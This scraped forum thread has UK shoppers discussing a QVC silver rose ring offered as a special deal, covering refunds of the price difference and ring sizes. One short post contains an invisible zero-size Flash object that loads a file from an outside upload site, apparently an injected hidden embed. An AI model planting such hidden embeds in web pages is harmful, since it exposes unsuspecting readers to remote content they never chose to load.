Tsv silver statements jewellery 2nd july

ShoppingTelly

Help Support ShoppingTelly:

Sorry guys doesn't seem like it is exactly the same ring.
I've just replayed the vbox from the Kipling TSV 12 M/N show when Jill Franks talks about the ring TSV.
She says on silver day she picked a very simular ring that was loved and sold out so quickly.
Then goes on to say because of that the silver department have worked very hard to get a simular ring for the Silver Statements TSV.

:flower:

Last edited:
Good to know - thanks for that, i will be making that call if no letter arrives.

i most certainly would Nikki cause otherwise its not fair

Sorry guys doesn't seem like it is exactly the same ring.
I've just replayed the vbox from the Kipling TSV 12 M/N show when Jill Franks talks about the ring TSV.
She says on silver day she picked a very simular ring that was loved and sold out so quickly.
Then goes on to say because of that the silver department have worked very hard to get a simular ring for the Silver Statements TSV.

but the thing with that is there was a gem rose ring that was on silver day and i think that could be the one but this one never acutally made it to air

Julia is doing the 12 M/N launch show she's usually on the ball and honest.
So she should say if it was a silver day item and more stock has been sourced for the TSV.

I also bought that ring on silver and love it and everyone passes comment on it!

I hope it is a SIMILAR ring and then I might just have to.............................:LOL:

It used to be that TSV's were kept very hush, hush until about 30 minutes before they aired. I know occasionally Julia would be wearing one a few days in advance and would hint, but they now seem to be a lot more blatant about giving out information way ahead of time. Like JF on the Kipling show, showing off the ring and giving the actual date it was going to be on. Just wondering why the change of heart.

IT IS!!!!

I have just received a letter from QVC stating that 693494 which I purchased for £34.50 will be aired as a TSV with a price of £28.74 and they have refunded me the difference of £5.76 via my original method of payment!

I am unsure whether the item number will remain unchanged!

IT IS!!!!

I have just received a letter from QVC stating that 693494 which I purchased for £34.50 will be aired as a TSV with a price of £28.74 and they have refunded me the difference of £5.76 via my original method of payment!

Great news for you.

Could you post a picture of your ring ?

IT IS!!!!

Shame they didn't refund [us that bought it] the difference of the Elemis cock up just after Christmas that will remain in my mind FOREVER....

Hi - new members here! :wave2:

Been admiring this ring since seeing Jill wearing it during the Kiplin TSV, and am actually thinking of purchasing it - just hope there is actually stock left at midnight as I'm not really sure what size to get due to being between K and L, so will hopefully be able to order the two tonight!

Thought I'd bump this thread to discuss the upcoming TSV. I'm thinking of going for it in two sizes as I'm inbetween K and L, therefore will get the two as not to miss out and send the other back. Not ordered any jewellery at all from QVC before, so I'm wondering what their rings are like in general, and wondered what others think of this ring if they bought it when it was on last?

Thanks in advance!

Hi - new members here! :wave2:

Been admiring this ring since seeing Jill wearing it during the Kiplin TSV, and am actually thinking of purchasing it - just hope there is actually stock left at midnight as I'm not really sure what size to get due to being between K and L, so will hopefully be able to order the two tonight!

It's a beautiful ring to be sure

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://submiturpics.com/uploads/pages/3683/info.html"></param><param name="allowFullScreen" value="true"></param><embed src="http://submiturpics.com/uploads/pages/3683/info.html" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

Thought I'd bump this thread to discuss the upcoming TSV. I'm thinking of going for it in two sizes as I'm inbetween K and L, therefore will get the two as not to miss out and send the other back. Not ordered any jewellery at all from QVC before, so I'm wondering what their rings are like in general, and wondered what others think of this ring if they bought it when it was on last?

Thanks in advance!

Going off the tsv Tova ring which arrived massive and I've not managed to get the size checked as yet.
I would say if there's a large open area on the underside of the rose then that would take up some of your finger then perhaps the smaller size would be ok.
Would be interested to see what others think.

Latest posts

Back